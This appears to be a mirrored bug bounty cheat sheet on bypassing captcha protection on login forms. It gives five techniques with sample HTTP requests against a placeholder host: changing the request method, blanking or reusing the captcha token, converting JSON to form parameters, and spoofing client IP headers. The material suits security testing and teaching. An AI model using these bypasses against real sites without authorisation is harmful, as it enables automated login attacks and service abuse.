mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
60 lines
1.1 KiB
Markdown
60 lines
1.1 KiB
Markdown
|
# Bypass Captcha
|
||
|
1. Try changing the request method, for example POST to GET
|
||
|
```
|
||
|
POST / HTTP 1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
|
||
|
```
|
||
|
|
||
|
Change the method to GET
|
||
|
```
|
||
|
GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP 1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
```
|
||
|
|
||
|
2. Try remove the value of the captcha parameter
|
||
|
```
|
||
|
POST / HTTP 1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
_RequestVerificationToken=&_Username=daffa&_Password=test123
|
||
|
```
|
||
|
|
||
|
3. Try reuse old captcha token
|
||
|
```
|
||
|
POST / HTTP 1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
_RequestVerificationToken=OLD_CAPTCHA_TOKEN&_Username=daffa&_Password=test123
|
||
|
```
|
||
|
|
||
|
4. Convert JSON data to normal request parameter
|
||
|
```
|
||
|
POST / HTTP 1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
{"_RequestVerificationToken":"xxxxxxxxxxxxxx","_Username":"daffa","_Password":"test123"}
|
||
|
```
|
||
|
Convert to normal request
|
||
|
```
|
||
|
POST / HTTP 1.1
|
||
|
Host: target.com
|
||
|
[...]
|
||
|
|
||
|
_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123
|
||
|
```
|
||
|
|
||
|
5. Try custom header to bypass captcha
|
||
|
```
|
||
|
X-Originating-IP: 127.0.0.1
|
||
|
X-Forwarded-For: 127.0.0.1
|
||
|
X-Remote-IP: 127.0.0.1
|
||
|
X-Remote-Addr: 127.0.0.1
|
||
|
```
|